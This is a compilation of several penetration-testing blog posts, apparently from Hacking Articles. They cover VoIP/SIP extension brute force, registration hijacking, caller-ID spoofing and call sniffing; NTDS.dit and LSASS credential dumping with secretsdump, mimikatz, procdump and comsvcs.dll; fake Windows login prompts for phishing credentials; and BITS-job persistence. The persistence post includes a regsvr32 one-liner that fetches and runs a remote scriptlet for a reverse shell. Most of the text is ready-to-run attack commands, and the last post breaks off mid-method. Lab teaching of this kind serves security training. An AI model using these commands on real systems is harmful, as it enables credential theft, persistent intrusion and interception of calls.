Today we will be learning about VoIP Penetration Testing this includes, how to enumeration, information gathering, User extension, and password enumeration, sip registration hijacking and spoofing.

Table of Content

• Introduction to VoIP
  • Uses of VoIP
• SIP Protocol
  • SIP Requests
  • SIP Responses
  • SIP Interaction Structure
• Real-Time Transport Protocol
• Configurations Used in Practical
• Setting Viproy VoIP Kit
• Identifying SIP Servers
• Extension Brute-force
• Extension Registration
• Call Spoofing
• Log Monitoring
• Sniffing Calls using Wireshark

Introduction to VoIP

VoIP means Voice over Internet Protocol, it’s called IP telephony, VoIP is used for communication purpose. VoIP technology allows you to make audio calls using the Internet connection instead of a regular phone (Landlines, mobile phones). Some VoIP partners may only allow you to call other people using the same service, but others may allow you to call anyone who has a telephone number – including local, long-distance, mobile, and international numbers. Also, while some VoIP services only work over your computer or a special VoIP phone (example a Cisco or Polycom, etc.).

VoIP by default use 5060 as its SIP signaling port. This used for registration When a phone (example a Cisco, Polycom, etc.) registers with Asterisk on port 5060.

The below mention functionality commonly used within VoIP installations that are not common in legacy telephony networks:

• Usage of multiple lines (PRI lines, BRI Lines) and extensions
• Voicemail service
• Voice recording
• Administrative Control
• Register calls
• Modular Configurations
• IVR and welcome messages

SIP Protocol

The Session Initiation Protocol (SIP) allows us to establish communication, end or change voice or video calls. The voice or video traffic is transmitted via the Real-Time Protocol (RTP) protocol. SIP is an application layer protocol that uses UDP or TCP for traffic. By default, SIP uses port 5060 UDP/TCP for unencrypted traffic or port 5061 for TLS encrypted traffic. As we will see later, Man-in-the-Middle (MITM) attack vectors exist for all types of communication, including VoIP/SIP. Therefore, encryption is a necessary compensating control to have in place regardless of the environment or service method Session Initiation Protocol is ASCII based and very similar to the HTTP protocol as it uses a Request/Response Model. Requests to the SIP client are made through SIP URI and AGI via a user-agent similar to an HTTP request made by a web browser.

SIP Requests

The following request types are common within SIP:

Based on modifies the state of the session without changing the state of the dialogue

SIP Responses

We can understand the Responses using the Response code. The general categories of the Response codes are given below:

• 1xx (Informational)
• 2xx (Success)
• 3xx (Redirection)
• 4xx (Failed requests)
• 5xx (Web server cannot complete request)
• 6xx (Global errors)

SIP Interaction Structure               

The Typical SIP Interaction Structure consists of the following:

1. The sender initiates an INVITE request.
2. The receiver sends back a 100 (Trying) response.
3. The sender starts ringing by sending a 180 (Ringing) response.
4. The receiver picks up the phone and a 200  success response is sent (OK).
5. ACK is sent by the initiator.
6. The call started using RTP.
7. BYE request sent to end the call.

Real-time Transport Protocol

The RTP is a network protocol for delivering audio and video over networks. RTP protocol is used in communication and entertainment systems that involve streaming media such as telephony and video or teleconference applications. RTP default port from 16384 to 32767, those ports used for sip calls. In our scenario, we are using the UDP port range 10000-20000 for RTP-the media stream, voice, and video channels.

Configurations used in Practical

• Attacker:
  • OS: Kali Linux 2020.1
  • IP: 192.168.1.4
• Target:
  • VOIP Server: Trixbox
  • VOIP Client: Zoiper
  • IP: 192.168.1.7

We have already published an article on How to Setup a VoIP Server. Please read it before proceeding further. We will be using the same server that we configured in that article

Lab Setup for VOIP Penetration Testing

Setting up Viproy VoIP Kit

Before beginning with the Penetration Testing, we need to add the Viproy-VoIP kit to our Metasploit. A detailed procedure on how to add modules in Metasploit can be found here. The steps depicted are taken form Rapid7 and Viproy Author.

We need to install some dependencies. First, we will be updating our sources and then install the following dependencies.

sudo apt update && sudo apt install -y git autoconf build-essential libcap-dev libpq-dev zliblg-dev libsqlite3-dev

Once we are done with installing all the dependencies, its time to clone the Viproy Repository to our Kali Linux. It contains the modules that we need to add in our Metasploit Framework

git clone https://github.com/fozavci/viproy-VoIPkit.git

Here we can see that we have the lib directory and the modules directory as well as the kaliinstall script.

Before running the script, we need to manually copy the contents of the lib directory and the modules directory to the Metasploit’s lib and modules directory respectively.

cp lib/msf/core/auxiliary/* /usr/share/metasploit-framework/lib/msf/core/auxiliary/
cp modules/auxiliary/VoIP/viproy-VoIPkit* /usr/share/metasploit-framework/modules/auxiliary/VoIP/
cp modules/auxiliary/spoof/cisco/viproy-VoIPkit_cdp.rb /usr/share/metasploit-framework/modules/auxiliary/spoof/cisco/

Now we need to make the entries of the modules we copied in the Mixins Files located at /usr/share/Metasploit-framework/lib/msf/core/auxiliary/.

echo "require 'msf/core/auxiliary/sip'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/skinny'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/msrp'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb

This can be done manually as well or using another text editor.

This is all that we needed to do. If this method doesn’t work or gives some errors. The author was kind enough to give a pre-compiled version. To install that we will be following these steps.

First, we will clone the precompiled version form the GitHub.

git clone https://github.com/fozavci/metasploit-framework-with-viproy-VoIPkit.git

Then we will traverse into the directory and install the viproy using gem.

cd metasploit-framework-with-viproy/
gem install bundler
bundle install

It will take some time. After it’s done we will need to reload the modules in Metasploit Framework.

reload_all

That was the installation of the Viproy Toolkit. Let’s start Penetration Testing on our VoIP Server.

In a VoIP network, information that can be proven useful is VoIP gateway’s or servers, IP-PBX systems, client software (softphones)/VoIP phones and user extensions. Let’s have a look at some of the widely used tools for enumeration and fingerprinting.

Identifying SIP Servers

By using sip Metasploit Scanner Module identify systems by providing a single IP or a range of IP addresses we can scan all the VoIP Servers and their enabled options.

use auxiliary/scanner/sip/options
set rhosts 192.168.1.0/24
run

Here, we can see that our scan gave us a VoIP Server running on 192.168.1.7. We can also see that it has a User-Agent as “Asterisk” and we can see that it has multiple Requests enabled on it.

Extension Bruteforce

Next, we will be doing a brute-force on the target server to extract the Extensions and Passwords or secrets. For this particular practical, we made 2 dictionaries. One for the usernames and other for the passwords. Next, we need to define the range for the extensions. We chose the range 0000000 to 99999999. And then we run the exploit

use auxiliary/voip/viproy_sip_bruteforce
set rhosts 192.168.1.7
set minext 00000000
set maxext 99999999
set user_file /home/kali/user.txt
set pass_file /home/kali/pass.txt
exploit

Here, we can see that we were able to extract 10 extensions. Ensure that the secret that we setup for the extension is difficult to guess to prevent brute-force of this kind.

Extension Registration

Since we have the extensions and the secrets. Now it’s time to move one step ahead and register the extensions so that we can be able to initiate calls from the attacker machine. We chose the extension 99999999. We cracked its secret to be 999. Now, all we had to do is provide the server IP address and the extension and secret. As soon as we run the auxiliary, we get a 200 OK response from the server telling us that the extension is registered with this IP Address.

use auxiliary/voip/viproy_sip_register
set rhosts 192.168.1.7
set username 99999999
set password 999
run

Here, we have to register the software as we don’t have a trunk line or PSTN lines or PRI line for making the outgoing calls. Hence, we are testing the extension to extension calling.

Call Spoofing

In the previous practical, we registered the extension 99999999, now we will be using it for calling the extension 00000000. Here we can spoof the Caller ID to whatever we want. We have set it to Hacker. We need to define the login to true so that we can log in to the server with the 999 secret. We also have to set the numeric user true so that it can accept the numeric extensions.

use auxiliary/voip/viproy_sip_invite
set rhosts 192.168.1.7
set to 00000000
set from 99999999
set login true
set fromname hacker
set username 99999999
set password 999
set numeric users true
run

As soon as we run the auxiliary, we can see that there is a call initiated from the extension 999999999 to the extension 00000000 which we set on our Zoiper Client. We can also see that we have the Hacker Caller ID that we set in the auxiliary.

Log Monitoring

We can monitor the logs on the VoIP Server which contains the information about all the calls that were initiated, connected, dropped. All the extensions and other important information. We can always brute-force it or check for default credentials. First, we will connect the server using the ssh and then we will run the following command to open up the asterisk console panel. This panel records the logs in real-time.

ssh 192.168.1.7
asterisk -rvvvvvvvvvvvvvvv

Sniffing Calls using Wireshark

When users initiate a phone call, we can observe the captured SIP traffic using Wireshark. We launch the Wireshark and choose the network adapter on which the VoIP server is working on. Then we start capturing packets. If we observe closely, we can see that there is a tab called Telephony in Wireshark’s Menu. In the drop-down menu, we have the first option “VoIP Calls”.

As soon as we click on the VoIP Calls, a window opens up showing all the calls that have been captured during the sniffing. We see that there is a sequence of packets from one IP Address to another.

If we click on the Flow Sequence button at the bottom, we could see the SIP Communication handshakes that we learned about in the Introduction.

In this picture, we can analyze a call in-detail. In a SIP call flow, there are several SIP transactions. A SIP transaction consists of several requests and answers and the way to group them in the same transaction is using the CSeq:103 parameter.

The first step is the must be registering the extension. After extension registration corresponds to a session establishment. From extension 99999999 session consists of an INVITE request of the user to the 00000000. Immediately, the proxy sends a TRYING 100 to stop the broadcastings and reroute the request to the extension 00000000.

The extension 00000000 sends a Ringing 180 when the telephone begins to ring and it is also rerouting by the proxy to the A user. Finally, the OK 200 message corresponds to the accept process (the extension 00000000 response the call). After ringing the call server try to assign the RTP ports and the RTP transport protocol starts with the parameters (ports, addresses, codecs, etc.) of the SDP protocol. The last transaction corresponds to a session end. This is carried out with an only BYE request to the Proxy and later reroute to extension 00000000.

This user replies with an OK 200 message to confirm that the final message has been received correctly. The call has been initiated by a user named hacker with the extension 99999999 to extension 00000000. The duration of the call and the current state can be seen in the above example. Wireshark assembled the call packets and now we can listen to the entire phone call. After disconnecting we play the entire phone call conversion.

When we click the Play Streams button it asks the output device based on your laptop driver. Then we can click on Play Button and we can hear the conversation that was made on that VoIP Call.

This was one of the articles in a series of articles that we are currently researching on VoIP. Stay Tuned for more!

Author: Madhava Rao Yejarla is an Ethical Hacker, Security Analyst, Penetration Tester from India. Contact on LinkedIn or Twitter

The post Penetration Testing on VoIP Asterisk Server appeared first on Hacking Articles.

In this article, you will learn how passwords are stored in NTDS.dit file on Windows Server and then we will learn how to dump these credentials hashes from NTDS.dit file.

Table of Content

• Introduction to NTDS
  • NTDS Partitions
  • Database Storage Table
• Extracting Credential by Exploit NTDS.dit in Multiple Methods
  • FGDump
  • NTDSUtil
  • DSInternals
  • NTDSDumpEx
  • Metasploit
    • NTDS_location
    • NTDS_grabber
    • secretsdump
  • Cracking Hashes

Introduction to NTDS

NTDS stands for New Technologies Directory Services and DIT stands for Directory Information Tree. You can find NTDS file at “C:\Windows\NTDS”. This file acts as a database for Active Directory and stores all its data including all the credentials. The Default size of Ntds.dit is 12 MB which can be extended up to 16TB.

The active directory database is stored in a single NTDS.dit file which is logically separated into the following partitions:

If you take a look at the information that NTDS provides you then you can see that Schema partition contains all the necessary information about objects along with their attributes and their relation to one another. Configuration partition has all the forest and trees which further replicates itself to al the domain controllers. Domain partition consists of all the information related to the domain. And finally, all the details related to any application are stored in the application partition of Active Directory. From a different perspective, you can also divide data which is found in NTDS in the Link table and data table. The Link table has all the attributes which refer to the objects finally the data table contains all the data related users, groups, etc.

The physical structure of NTDS has EDB.LOG, EDB.CHK, RES1.LOG, RES2.LOG.

Data Store Physical Structure Components

Now that we have an idea about the NTDS, it is time to extract some of those precious hashes from the Server. We have the Windows Server with Active Directory setup in our lab environment for the following practical.

Extracting Credential by Exploit NTDS.dit in Multiple Methods

FGDump

FGDump is a tool that was created for mass password auditing of Windows Systems. This means that if an attacker can use the FGDump to extract the password from the target machine. For these purposes, we will need to download the FGDump from this link.

We fire up the windows command prompt and traverse to the path where we have downloaded the FGDump. In this case, it is in the Downloads Directory. As we have an executable for the FGDump, we ran it directly from the command prompt. 

fgdump.exe

As no parameters were provided, FGDump by default did a local dump. After auditing the local passwords, FGDump dumped Password and Cache successfully. Now let’s take a look at the dumped data.

FGDump creates a file with the extension PWDump. It-dumps hashes in that file. The name of the server is used as the name of the PWDump file. We can read the data on the file using the type command. As shown in the image given below, FGDump has successfully dumped hashes from the Target System.

type <pwdump file name>

Powershell: NTDSUtil

Enough with the Windows Command prompt, it’s time to move on to the PowerShell. We are going to use another executable called NTDSutil.exe. We launch an instance of PowerShell. Then we run NTDSutil.exe with a bunch of parameters instructing it to make a directory called temp in the C:\ drive and asks NTDSUtil to use its ability to tap into the Active Directory Database and fetch the SYSTEM and SECURITY hive files as well as the ntds.dit file. After working for a while, we have the hive files in the temp directory.

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We transfer the hive files onto our Kali Linux Machine, to extract hashes from them. We will be using the secretsdump.py file from the impacket toolkit to extract hashes. All we need is to provide the path of the SYSTEM hive file and the NTDS.dit file and we are good to go. We see that in a matter of seconds secretsdump extracts hashes for us.

./secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL

DSInternals

DSInternals is a framework designed by Michael Grafnetter for performing AD Security Audits. It is a part of the PowerShell official Gallery. This means we can download it by using the cmdlet Save-Module. After downloading we need to install the module before using it. This can be done using the cmdlet Install-Module. This will require a change in the Execution Policy. After installing the Modules, we are good to go.

We first use the Get-Bootkey cmdlet to extract the bootkey from the System Hive. After obtaining the bootkey, we will use it to read the data of one or more accounts form the NTDIS file including the secret attributes like hashes using the Get-ADBAccount cmdlet.

Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Set-ExecutionPolicy Unrestricted
Import-Module DSInternals
Get-BootKey -SystemHivePath 'C:\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\ntds.dit' -Bootkey <bootkey value>

The Get-ADBAccount cmdlet creates a long sequence of output. Here we are showing you the data of one of the users of the Target Machine. We can see that we have successfully extracted the NTLM hashes from the NTDS.dit file.

NTDSDump.exe

Now it’s time to use some external tools for attacking the NTDIS file. We will be using the NTDSDumpEx for this particular Practical. You can download it from here. We unzip the contents of the compressed file we downloaded and then use the executable file to attack the NTDS file. We will need to provide the path for the ntds.dit file and the System Hive file. In no time the NTDSDumpEx gives us a list of the users with their respective hashes.

NTDSDumpEx.exe -d C:\ntds.dit -s C:\SYSTEM

Remote: Metasploit (NTDS_location)

For all the Metasploit fans, there is no need to get depressed. Metasploit can work just fine in extracting hashes from the NTDS.dit file. We have 2 exploits that can work side by side to target NTDS. The first one locates the ntds file. We need a session on the Target System to move forward. After we gain a session, we choose the NTDS_location exploit and set the session identifier to the exploit. Upon running the exploit, we see that we have the location of the NTDS.dit file.

use post/windows/gather/ntds_location
set session 1
exploit

Metasploit (NTDS_grabber)

Moving on, we use another exploit that can extract the NTDS.dit file, SAM and SYSTEM hive files from the Target System. The catch is, it transfers these files in .cab compressed files.

use post/windows/gather/ntds_grabber
set session 1
exploit

The exploit works and transfers the cab file to a location that can be seen in the image. Now to extract the NTDS.dit and other hive files, we are going to use a tool called cabextract. This will extract all 3 files.

cabextract <cab filename>

Now that we have the NTDS and the hive files at our disposal, we can use the impacket’s secretsdump script to extract hashes from it as we did earlier.

Remote: Metasploit (secretsdump)

Suppose a scenario where we were able to procure the login credentials of the server by any method but it is not possible to access the server directly, we can use this exploit in the Metasploit framework to extract the hashes from the NTDS.dit file remotely. We will use this auxiliary to grab the hashes. We need to provide the IP Address of the Target Machine, Username and Password. The auxiliary will grab the hashes and display it on our screen in a few seconds.

use auxiliary/scanner/smb/impacket/secretsdump
set rhosts 192.168.1.108
set smbuser administrator
set smbpass Ignite@987
exploit

Hash Cracking

To ensure that all the hashes that we extracted can be cracked, we decided to take one and extract it using John the Ripper. We need to provide the format of the hash which is NT. John the Ripper will crack the password in a matter of seconds.

cat hash
john --format=NT hash --show

This concludes the various methods in which can extract the hashes that are stored in the Windows Server. We included multiple tools to cover the various scenarios that an attacker can face. And the only way to protect yourself against such attacks is to minimise the users who can access Domain Controllers. Continuously, log and monitor the activity for any changes. It is frequently recertified.

Reference: How the Data Store Works

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: NTDS.dit appeared first on Hacking Articles.

This is the ninth article in our series of Credentials Dumping. In this article, we will trigger various scenarios where Windows will ask for the user to perform authentication and retrieve the credentials. For security purposes, Windows make it essential to validate user credentials for various authentications such as Outlook, User Account Control, or to sign in Windows from the lock screen. We can use this feature to our advantage to dump the credentials after establishing the foothold on the Target system.  To exploit this feature, we will use phishing techniques to harvest the credentials.  

Table of Content

• Metasploit Framework
  • phish_windows_credentials
  • FakeLogonScreen
  • SharpLocker
• PowerShell Empire
  • Collection/prompt
  • Collection/toasted
• Kodiac
  • Password_box
• PowerShell
  • Invoke-CredentialsPhish.ps1
  • Invoke-LoginPrompt.ps1
• Lockphish
• Conclusion

Metasploit Framework: phish_windows_credentials

Metasploit comes with an in-built post exploit which helps us to do the deed. As it is a post-exploitation module, it just needs to be linked with an ongoing session. To use this module, simple type:

use post/windows/gather/phish_windows_credentials
set session 1
exploit

This module waits for a new process to be started by the user. After the initiation of the process, a fake Windows security dialogue box will open, asking for the user credentials as shown in the image below:

As the user enters their credentials, they will be apprehended and displayed as shown in the image below:

FakeLogonScreen

FakeLogonScreen tool was created by Arris Huijgen. It is developed in C# because it allows various Frameworks to inject the utility in memory. We will remotely execute this tool using Metasploit. But first, let’s download the tool using the link provided below

Download FakeLogonScreen

We simply upload this tool from our meterpreter session and then remotely execute it using the following set of commands:

upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

Upon execution, it will simulate the Windows lock screen to obtain the password from the user. To do so, this tool will manifest the lock screen exactly like it is configured so that the user doesn’t get suspicious, just as it is shown in the image below:

It will validate the credentials locally or from Domain Controller as the user enters them and then display it on the console as shown in the image below:

SharpLocker

This tool is very similar to the previous one. It was developed by Matt Pickford. just like FakeLogonScreen, this tool, too, will exhibit the fake lock screen for the user to enter credentials and then dump then keystroke by keystroke to the attacker.

Download SharpLocker

We will first upload this tool from our attacker machine to the target system and then execute it. So, when you have the meterpreter session just type:

upload /root/Downloads/SharpLocker.exe .
shell
SharpLocker.exe

We downloaded the tool on the Desktop so we will traverse to that location and then execute it

Upon execution the tool will trigger the lock screen of the target system as shown in the image below:

And as the user enters the password, it will capture the keystrokes until the whole password is revealed as shown in the image below:

PowerShell Empire: collection/prompt

This module of the PowerShell Empire will prompt a dialogue box on the target system, asking for credentials like we did earlier. We can use this module with the following commands:

usemodule collection/prompt
execute

Once the user types in the credentials on the dialogue box, the module will display it on the terminal as shown in the image below:

PowerShell Empire: collection/toasted

This module of PowerShell Empire triggers a restart notification like the one which is generated when updates require and reboot to install. To use this module type the following command:

usemodule collection/toasted
execute

Once the module executes, it will show the following dialogue box:

And once the Postpone button is clicked, it will ask for credentials to validate the decision to postpone as shown in the image below:

And as the user enters the credentials, It will print them as shown in the image below:

Kodiac

A similar module to the one in PowerShell Empire can be found in Kodiac. Once you have the session using Kodiac, use the following command to trigger the dialogue box:

use password_box
execute

When the user enters the username and password in the dialogue box, the password will be displayed in the terminal too as shown in the image below:

PowerShell: Invoke-CredentialsPhish.ps1

There is a script that can be run on PowerShell which creates a fake login prompt for the user to enter the credentials.

Download Invoke-CredentialsPhish.ps1

To initiate the script, type:

Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish

The execution of the above commands will pop out a prompt asking for credentials as shown in the image below:

So, once the user enters the credentials, they will be displayed on the screen as shown in the image below:

PowerShell: Invoke-LoginPrompt.ps1

Similarly, there is another script developed by Matt Nelson. This script will again open a dialogue box for the user to enter the passwords.

Download Invoke-LoginPrompt.ps1

To initiate the script type the following:

Import-Module C:\Users\raj\Desktop\Invoke-LoginPrompt.ps1

Invoke-LoginPrompt.ps1

As you can see the dialogue box emerges on the screen and the user enters the credentials, then further they will be displayed back on the terminal.

Lockphish

Lockphish is another tool that allows us to phish out the credentials, you can download this tool from here. This tool creates a template that looks like it is redirecting the user to a YouTube Video will be hosted into PHP server, but it will prompt the user to enter the login credentials and then send them to the attacker.

Initiate the tool using the following command:

./lockphish.sh

It will generate a public link using ngrok as shown in the image above, send that link to the target. When the target executed the link it asks to save a file. For this step, strong social engineering skills are required.

Then upon executing the downloaded file, the lock screen will be triggered and the user will be forced to enter the credentials as shown in the image below:

And after the user has entered the credentials, It will redirect the user to the YouTube.

And, we will have our credentials as shown in the image below:

Conclusion

These were various methods that we can use to dump the credentials of the target system. Depending upon the scenarios the appropriate method for dumping the credentials should be used. The PowerShell methods are best to validate the credentials as the prompt doesn’t close till the correct credentials are entered. Lockphish method doesn’t create the lock screen as accurately as other tools and it also does not validate the credentials. Hence each method and tool have their advantages and disadvantages. But all of them are fairly good and working.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Credential Dumping: Phishing Windows Credentials appeared first on Hacking Articles.

In this article, we are going to describe the ability of the Bits Job process to provide persistent access to the Target Machine.

Table of Content

• Introduction
• Configurations used in Practical
• Manual Persistence
• Metasploit Persistence
• Metasploit (file-less) Persistence
• Mitigation

Introduction

Background Intelligent Transfer Service Admin is a command-line tool that creates downloads or uploads jobs and monitors their progress. BITSAdmin was released with the Windows XP. At that time, it used the IBackgroundCopyJob as its interface. The Upload option of the BITSAdmin was introduced with the release of Windows Server 2003. With the release of Windows Vista, we had some more additional features like Custom HTTP headers, Certificate-based client authentication, IPv6 support. Subsequent year was the release of the Windows Server 2008, it introduced the File Transfer Notification Method. Windows 7 introduced Branch Cache Method for the BITS Transfer. When BITS downloads a file, the actual download is done behind the svchost.exe service. BITSAdmin is used to download files from or upload files to HTTP web servers and SMB file shares. It takes the cost of the transfer into account, as well as the network usage so that the user’s foreground work is not influenced. BITS can handle network interruptions, pausing and automatically resuming transfers, even after a reboot.

Read more about BITS Jobs form our dedicated article here.

Configurations used in Practical

Attacker:

    OS: Kali Linux 2020.1

    IP: 192.168.1.112

Target:

    OS: Windows 10

    IP: 192.168.1.102

Manual Persistence

Let’s talk about manual persistence. In this scenario, we are going to assume the physical access of the target system as well as the meterpreter session on it. After gaining the meterpreter session, upload a payload to the target system which will get us the persistence session.  

upload /root/raj.exe C:\

Now, we have the payload named “raj.exe”. We will configure a BITS Job to execute it at some intervals of time. Since we have the physical access of the system in this scenario, we will be using a command prompt for the following steps.

First, we will be creating a job named payload. It can be anything we want. We will execute all these commands using BITSAdmin. It is the tool that handles all the BIT Jobs.

bitsadmin /create payload

Now, as the BITS Jobs were created to transfer or mostly download files from the Microsoft Servers or any other server for that matter. It needs to add a file into its configuration before it can move forward. Now this URL we provided was bogus. It can be anything as it has no role except fulfill the configuration requirements of BITSAdmin.

bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"

BITS Jobs can run a command upon the execution of its jobs. This was meant so that any prompt can be generated while downloading an update or some other task can be done simultaneously to the download. We will use this command to execute the payload that we uploaded earlier with the help of a meterpreter.

bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL

When a BITS download fails it can retry to download after a specific duration of time. This can be set using SetMinRetryDelay Option. We will use this option to run our payload again and again so that in a case we lose the session, upon the next execution we can get the session again. We set it to 40 seconds here. Now, all we need is to initiate this job. It can be done using the resume option.

bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload

We went back to our Kali Attacker Machine and we started a multi handler listener to grab the session that would be generated due to the BITS Job. We set it to the configuration that we used to create the raj.exe payload. In a moment, we see that another meterpreter session spawned. Now, if the configuration is correct, we will have sessions every 40 seconds.

Metasploit Persistence

Next Scenario, it’s not too different than the previous scenario. All that changed is that we lost the physical access to the system. So we need to create the BITS Job remotely. The methods and command will remain the same just that after we uploaded the payload, we will run the shell command in meterpreter. Now all the commands that we ran to create the persistence previously we will run the same form here.

upload /root/raj.exe C:\
shell
bitsadmin /create payload
bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"
bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL
bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload

And we started the multi handler listener on the other terminal so that it can capture the session generated by the BITS Job that we just configured. Soon enough we have a new session.

We performed this method to provide the insight that this kind of attack can be performed remotely without any physical access to the system.

Metasploit (file-less) Persistence

In the previous methods, we created a payload and sent that to the Target Machine. That payload would create evidence of malicious activity. It can be located by the user or any Anti-Virus Software. So, we thought of creating a persistence without sending any file.

Note: This method will still able to detect from the BITS logs.

We will be using a malicious one-liner which will be executed using regsvr32. First, we need to create the one-liner. We will be using the multi/script/web_delivery for this task. We set up the configurations to the exploit like IP Address and the port of the Attacker Machine where we will be receiving the session. We copy the script created to our clipboard.

use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 1234
exploit
regsvr32.exe "/s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll

Now, we need the meterpreter session on the target systems as we had in the previous methods. We will be running the shell command on the meterpreter. Now we need to create a job. We name it payload as before. Again it can be anything we want. Then we have the bogus link that we added in the previous methods. Now its time to configure the command. Here we will configure the BITS Job to run the malicious one-liner we copied earlier. Then we will set the delay and we are good to go.

shell
bitsadmin /create payload
bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"
bitsadmin /SetNotifyCmdLine payload regsvr32.exe "/s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll"
bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload

Back on the attacker machine, our web_delivery exploit creates a listener on its own. In some time we have the session that is configured to be persistent.

This concludes the ability of BITS Job to provide persistence shells on the Windows Machines. Now let’s take a look at some useful mitigations against these kinds of attacks.

Mitigation

Our recommendations for mitigating BITS Jobs are:

• Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.
• Reduce the default BITS job lifetime in Group Policy or by editing the “JobInactivityTimeout” and “MaxDownloadTime” Registry values in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS. The default maximum lifetime for a BITS job is 90 days, but that can be modified.
• Limit the access of the BITSAdmin interface to specific users or groups.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the COVID-19. I am writing this article while Working from home. Take care and be Healthy!

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

The post Windows Persistence using Bits Job appeared first on Hacking Articles.

LSA and LSASS stands for “Local Security Authority” And “Local Security Authority Subsystem (server) Service”, respectively

The Local Security Authority (LSA) is a protected system process that authenticates and logs users on to the local computer. Domain credentials are used by the operating system and authenticated by the Local Security Authority (LSA). The LSA can validate user information by checking the Security Accounts Manager (SAM) database located on the same computer.

The LSA is a user-mode process (LSASS.EXE) used to stores security information of a system known as the Local Security Policy. The LSA maintains local security policy information in a set of objects.

• The policy contains global policy information.
• TrustedDomain contains information about a trusted domain.
• The account contains information about a user, group, or local group account.
• Private Data contains protected information, such as server account passwords. This information is stored as encrypted strings.

LSASS manages the local system policy, user authentication, and auditing while handling sensitive security data such as password hashes and Kerberos keys. The secret part of domain credentials, the password, is protected by the operating system. Only code running in-process with the LSA can read and write domain credentials.

LSASS can store credentials in multiple forms, including:

• Reversibly encrypted plaintext
• Kerberos tickets (ticket-granting tickets (TGTs), service tickets)
• NT hash
• LAN Manager (LM) hash

LSA (LSASS.EXE) Credential Dumping Walkthrough

Required Tools or Scripts: Mimikatz.exe & Mimikatz.ps1, Procdump PowerShell Empire, Koadic, Metasploit

Host Machine: In the context of lsass.exe Windows 7 & for LSA Windows 10

Table of Content

• Windows 7 (lsass.exe) Credential Dump using Mimikatz
• Windows 10 (LSA) Credential Dump using Mimikatz
• PowerShell Empire
• Koadic
• Metasploit

Windows 7 (lsass.exe) Credential Dump using Mimikatz

Method 1: Task manager

In your local machine (target) and open the task manager, navigate to processes for exploring running process of lsass.exe and make a right-click to explore its snippet.  Choose “Create Dump File” option which will dump the stored credential.

You will get the “lsass.DMP” file inside the /Temp directory of the user account directory under /AppData/local

Now start mimikatz to get the data out of the DMP file using the following command:

privilege::debug
sekurlsa::minidump C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

As you can see from the image below, we have a clear text password.

Method 2: ProcDump

The ProcDump tool is a free command-line tool published by Sysinternals whose primary purpose is monitoring an application and generating memory dumps.

Use the “-accepteula” command-line option to automatically accept the Sysinternals license agreement and “-ma” Parameter to write a dump file with all process memory (lsass.exe) in a .dmp format.

procdump.exe -accepteula -ma lsass.exe mem.dmp

Again, repeat the same step and use mimikatz to read the mem.dmp file.

privilege::debug
sekurlsa::minidump C:\Users\raj\Downloads\Procdump\mem.dmp
sekurlsa::logonpasswords

And now, as you can see from the image below, we’ve got a clear-text password.

Method 2: comsvcs.dll

The comsvcs.dll DLL found in Windows\system32 that call minidump with rundll32, so you can use it to dump the Lsass.exe process memory to retrieve credentials. Let’s identify the process ID for lsass before running the DLL.

Get-Process Lsass
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 492 C:\mem.dmp full

Again, repeat the same step and use mimikatz to read the mem.dmp file.

privilege::debug
sekurlsa::minidump C:\mem.dmp
sekurlsa::longonpasswords

Again, we’ve got a clear-text password.

Windows 10 (LSA) Credential Dump

Method 1: Task manager

The Lsass.exe is renamed as LSA in Windows 10 and process can be found by the name of “Local Security Authority” inside the task manager.  It will also save the dump file in .dmp format so, again repeat the same steps as done above.

Go to the Task Manager and explore the process for Local Security Authority, then extract its dump as shown.

You will get the “lsass.DMP” file inside the /Temp directory of the user account directory under /AppData/local.

Again, repeat the same step and use mimikatz to read the dmp file.

privilege::debug
sekurlsa::minidump C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::longonpasswords

Since it was Windows 10 therefore, the level of security get increases and we have obtained the password hashes, as you can see from the given below image.

Method 2: Mimikatz parameter -patch

The “-patch” parameter is patching the samsrv.dll running inside lsass.exe which displays LM and NT hashes. So, you when you will execute the following commands it will dump the password hashes.

privilege::debug
lsadump:: lsa /patch

Method3: Mimikatz – Token Elevation

We are using mimikatz once again to get the hashes directly, without involving any dump file or DLL execution this is known as “Token Impersonation”. As you can observe, we got an error when we try to run following command as a local user.

privilege::debug
lsadump::secrets

This can be done by impersonate a token that will be used to elevate permissions to SYSTEM (default) or find a domain admin token and as the result, you will able to dump the password in clear-text.

privilege::debug
token::elevate
lasdump::secrets

Method 4: Editing File Permission in the Registry

